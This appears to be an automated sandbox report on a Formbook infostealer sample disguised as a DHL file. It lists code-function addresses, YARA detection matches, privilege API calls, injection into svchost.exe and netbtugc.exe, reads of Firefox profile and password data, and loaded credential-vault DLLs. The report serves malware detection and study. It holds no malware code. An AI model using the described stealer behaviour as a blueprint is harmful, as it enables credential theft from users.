Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A82F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A60F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE2F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A52E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A58DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADCD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A30CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A8739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A452A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE12ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5B2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4B1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A7516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A85630
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B095C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A31460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A7DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A85AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE1AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD5910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A49950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A03FD2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A03FD5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A49EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A43D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFFCF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB9C32
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E702C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E90274
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EB03E6
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DFE3F0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EAA352
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E82000
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EA81CC
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EB01AA
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EA41A2
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E78158
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DE0100
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E8A118
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E0C6E0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DEC7C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DF0770
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E14750
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E9E4F6
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EA2446
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E94420
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EB0591
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DF0535
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DEEA80
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EA6BD7
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EAAB40
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E1E8F0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DD68B8
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DF2840
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DFA840
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EBA9A6
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DF29A0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E06962
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EAEEDB
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E02E90
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EACE93
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DF0E59
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EAEE26
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DE2FC8
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DFCFE0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E6EFA0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E64F40
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E32F28
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E10F30
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E92F30
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DE0CF2
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E90CB5
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DF0C00
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DEADE0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E08DBF
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DFAD00
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E8CD1F
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E912ED
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E0B2C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DF52A0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E3739A
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DDD34C
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EA132D
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EA70E9
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EAF0E0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DF70C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E9F0CC
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DFB1B0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EBB16B
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E2516C
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DDF172
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EA16CC
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E35630
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EAF7B0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DE1460
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EAF43F
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E8D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EA7571
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E9DAC6
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E35AA0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E8DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E91AA3
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E63A6C
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EAFA49
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EA7A46
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E65BF0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E2DBF9
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E0FB80
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EAFB76
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DF38E0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E5D800
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DF9950
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E0B950
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E85910
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DF9EB0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DB3FD2
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DB3FD5
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DF1F92
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EAFFB1
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EAFF09
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EAFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E69C32
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E0FDC0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EA7D73
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DF3D40
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02EA1D5A
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_006115E0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0060C7C7
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0060C7D0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0060C9F0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0060AA70
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_006130EE
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_006130F0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_00629FD0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02BFA0AF
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02BFB8B4
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02BFB9D6
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02BFADD8
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02BFBD6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03AAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03A2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03A87E54 appears 110 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03ABF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03A75130 appears 58 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 02E5EA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 02DDB970 appears 280 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 02E25130 appears 58 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 02E6F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 02E37E54 appears 110 times
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: String function: 00C28900 appears 42 times
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: String function: 00C07DE1 appears 35 times
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: String function: 00C20AE3 appears 70 times
            Source: DHL 30312052024.exe, 00000000.00000003.1382853691.0000000003FAD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL 30312052024.exe
            Source: DHL 30312052024.exe, 00000000.00000003.1385174657.0000000003E53000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL 30312052024.exe
            Source: DHL 30312052024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@13/7
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6A06A GetLastError,FormatMessageW,0_2_00C6A06A
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C581CB AdjustTokenPrivileges,CloseHandle,0_2_00C581CB
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00C587E1
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00C6B3FB
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C7EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00C7EE0D
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_00C6C397
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C04E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C04E89
            Source: C:\Users\user\Desktop\DHL 30312052024.exeFile created: C:\Users\user\AppData\Local\Temp\autF93E.tmpJump to behavior
            Source: DHL 30312052024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000004.00000003.1726150757.000000000288B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3800906061.00000000028AF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1724459027.0000000002882000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1724324281.0000000002861000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3800906061.0000000002882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: DHL 30312052024.exeReversingLabs: Detection: 50%
            Source: unknownProcess created: C:\Users\user\Desktop\DHL 30312052024.exe "C:\Users\user\Desktop\DHL 30312052024.exe"
            Source: C:\Users\user\Desktop\DHL 30312052024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 30312052024.exe"
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | Section loaded: rasadhlp.dll
